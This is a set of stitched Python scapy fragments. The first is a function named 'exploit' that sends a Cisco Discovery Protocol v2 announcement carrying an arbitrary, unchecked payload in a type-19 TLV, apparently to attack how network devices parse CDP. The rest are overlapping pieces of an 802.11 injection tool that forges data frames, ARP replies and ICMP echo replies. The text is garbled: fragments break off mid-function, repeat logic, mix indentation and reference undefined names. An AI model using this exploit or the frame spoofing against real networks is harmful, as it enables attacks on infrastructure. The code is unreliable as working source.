def exploit(payload):
    """Send one CDPv2 announcement whose type-19 TLV carries *payload* verbatim.

    Frame layout, outermost first: Ether (to the CDP multicast MAC
    01:00:0c:cc:cc:cc; src is not set here) / LLC+SNAP / CDPv2 header /
    Device ID / Port ID / Address / Capabilities / TLV 19 / Power.  The frame
    is handed to ``sendp`` with scapy's defaults -- no iface, count or
    verbosity is passed.

    Args:
        payload: value placed unchanged into the type-19 TLV; this function
            performs no length or content check on it.

    Returns:
        None.

    Note: ``cmd`` (the Device ID value) is neither a parameter nor defined in
    this function; it must exist at module level or the call raises
    NameError.
    """
    # link layer -- dst is the CDP multicast address, src left for scapy to fill
    l2_packet = Ether(dst="01:00:0c:cc:cc:cc")
    # Logical-Link Control: SNAP encapsulation (DSAP/SSAP 0xAA, ctrl 0x03 = UI)
    l2_packet /= LLC(dsap=0xaa, ssap=0xaa, ctrl=0x03) / SNAP()
    # Cisco Discovery Protocol: version-2 header, ttl field set to 180
    cdp_v2 = cdp.CDPv2_HDR(vers=2, ttl=180)
    deviceid = cdp.CDPMsgDeviceID(val=cmd)  # NOTE(review): `cmd` is unbound in this block
    portid = cdp.CDPMsgPortID(iface=b"ens38")
    address = cdp.CDPMsgAddr(naddr=1,
                             addr=cdp.CDPAddrRecordIPv4(addr="192.168.204.77"))
    cap = cdp.CDPMsgCapabilities(cap=1)
    # TLV type 19 has no dedicated scapy class (hence "Unknown19"); the author
    # names it power_req, presumably CDP's Power Requested TLV -- unverified.
    power_req = cdp.CDPMsgUnknown19(val=payload)
    power_level = cdp.CDPMsgPower(power=16)
    # TLVs are stacked behind the header in the order listed above
    cdp_packet = cdp_v2 / deviceid / portid / address / cap / power_req / power_level
    packet = l2_packet / cdp_packet
    sendp(packet)
    def handle_read(self):
        """Forward one frame read from the tap device as an 802.11 from-DS data frame.

        Reads up to 1526 bytes from the tap, drops the 4-byte tap header and
        parses the rest as Ethernet.  The Ethernet payload is re-encapsulated
        as RadioTap / Dot11 [/ Dot11WEP] / LLC / SNAP and handed to ``sendp``.
        Addressing: addr1 is the Ethernet destination, addr2 the tap's BSSID,
        addr3 the configured source MAC or, when none is configured, the
        Ethernet source.  Returns None.
        """
        # | 4 bytes | 4 bytes |   18 bytes   |     1500 bytes    |
        #     Tap       VLAN    Ether Header          Frame
        raw = self.read(1526)
        ether_frame = Ether(raw[4:])
        ether = ether_frame.getlayer(Ether)

        # Radiotap header first, then the 802.11 data header.
        frame = self.radiotap()
        frame /= Dot11(type="Data",
                       FCfield="from-DS",
                       addr1=ether.dst,
                       addr2=self._tap.bssid)

        # The tuntap interface's MAC cannot be set at creation time, so the
        # source address is chosen here: the Ethernet source unless an
        # explicit smac was configured on the tap.
        configured_smac = self._tap.smac
        frame.addr3 = ether.src if configured_smac == '' else configured_smac

        if self._tap.has_wep:
            # Set the Protected bit and prepend a WEP header.  NOTE(review):
            # the IV is the constant "111"; if scapy actually encrypts here
            # (conf.wepkey set) every frame shares one RC4 keystream -- confirm
            # whether real encryption is intended.
            frame.FCfield |= 0x40
            frame /= Dot11WEP(iv="111", keyid=self._tap.key_id)

        # LLC/SNAP re-encapsulation keeps the original EtherType and payload.
        frame /= LLC(ctrl=3) / SNAP(code=ether.type) / ether.payload

        # Frame injection :
        sendp(frame, verbose=0)  # Send from-DS frame
                    if optios.verb:
                        os.write(1, "%s\n" % dot11_frame.summary())

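                # Building ARP Reply answer for injection: the reply goes back
                # to the requester (addr2 of the received frame) from our BSSID.
                dot11_answer = RadioTap() / Dot11(
                    type="Data",
                    FCfield="from-DS",
                    addr1=dot11_frame.getlayer(Dot11).addr2,
                    addr2=options.bssid)
                dot11_answer.addr3 = options.smac

                if options.wepkey is not None:
                    # Protected bit + WEP header.  NOTE(review): the IV is the
                    # constant "111"; if scapy encrypts (conf.wepkey set) every
                    # reply reuses one RC4 keystream -- confirm intent.
                    dot11_answer.FCfield |= 0x40
                    dot11_answer /= Dot11WEP(iv="111", keyid=options.keyid)

                # Mirror the request's sender/target fields into an is-at reply;
                # the request's payload is passed through unchanged.
                arp_request = dot11_frame.getlayer(ARP)
                dot11_answer /= LLC(ctrl=3) / SNAP() / ARP(
                    op="is-at",
                    hwsrc=options.smac,
                    psrc=arp_request.pdst,
                    hwdst=arp_request.hwsrc,
                    pdst=arp_request.psrc)

                dot11_answer /= arp_request.payload

                if options.debug:
                    # Fixed: 'optios' was a typo for 'options' and raised
                    # NameError whenever debug output was enabled.
                    # NOTE(review): os.write needs bytes on Python 3 -- confirm
                    # the interpreter this tool targets.
                    os.write(1, "Sending ARP Reply on %s\n" % options.out_iface)
                    if options.verb:
                        os.write(1, "%s\n" % dot11_answer.summary())

                # Frame injection :
                sendp(dot11_answer, verbose=0)  # Send frame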
            # Re-encapsulate the received Ethernet frame as an 802.11 from-DS
            # data frame: addr1 = Ethernet destination, addr2 = our BSSID.
            ether = eth_rcvd_frame.getlayer(Ether)
            dot11_sent_frame = RadioTap() / Dot11(
                type="Data",
                FCfield="from-DS",
                addr1=ether.dst,
                addr2=BSSID)
            # It doesn't seem possible to set tuntap interface MAC address
            # when we create it, so we set source MAC here: the configured
            # SMAC when there is one, else the Ethernet source.
            dot11_sent_frame.addr3 = SMAC if HAS_SMAC else ether.src
            if WEP:
                # Protected bit + WEP header.  NOTE(review): the IV is the
                # constant "111"; if scapy encrypts (conf.wepkey set) every
                # frame shares one RC4 keystream -- confirm intent.
                dot11_sent_frame.FCfield |= 0x40
                dot11_sent_frame /= Dot11WEP(iv="111", keyid=KEYID)
            # LLC/SNAP carries the original EtherType and payload unchanged.
            dot11_sent_frame /= LLC(ctrl=3) / SNAP(code=ether.type) / ether.payload

            if DEBUG:
                # Same two writes as before: the iface notice, then the
                # frame summary when verbose.
                notices = ["Sending from-DS to %s\n" % OUT_IFACE]
                if VERB:
                    notices.append("%s\n" % dot11_sent_frame.summary())
                for notice in notices:
                    os.write(1, notice)

            # Frame injection :
            sendp(dot11_sent_frame, verbose=0)  # Send from-DS frame

# Frame from WiFi network
        if s in r:

            # 802.11 maximum frame size is 2346 bytes (cf. RFC3580)
            # However, WiFi interfaces are always MTUed to 1500
                                         addr1 = dot11_frame.getlayer(Dot11).addr2,
                                         addr2 = options.bssid)
 
             # addr3: the configured source MAC, otherwise echo back the
             # request's addr1 (the address the request was sent to).
             dot11_answer.addr3 = (dot11_frame.getlayer(Dot11).addr1
                                   if options.smac is None else options.smac)

             if options.wepkey is not None:
                 # Protected bit + WEP header.  NOTE(review): the IV is the
                 # constant "111"; if scapy encrypts (conf.wepkey set) every
                 # reply reuses one RC4 keystream -- confirm intent.
                 dot11_answer.FCfield |= 0x40
                 dot11_answer /= Dot11WEP(iv="111", keyid=options.keyid)

             # Swap the IP endpoints and mirror the ICMP id/seq so the reply
             # matches the request; the request payload is passed through.
             ip_request = dot11_frame.getlayer(IP)
             icmp_request = dot11_frame.getlayer(ICMP)
             dot11_answer /= LLC(ctrl=3) / SNAP() / IP(src=ip_request.dst,
                                                       dst=ip_request.src,
                                                       ttl=options.ttl)
             dot11_answer /= ICMP(type="echo-reply",
                                  id=icmp_request.id,
                                  seq=icmp_request.seq)
             dot11_answer /= icmp_request.payload
     
         if options.debug:
             # Same two writes as before: the iface notice, then the reply
             # summary when verbose.
             notices = ["Sending ICMP Echo Reply on %s\n" % options.out_iface]
             if options.verb:
                 notices.append("%s\n" % dot11_answer.summary())
             for notice in notices:
                 os.write(1, notice)
 
         # Frame injection :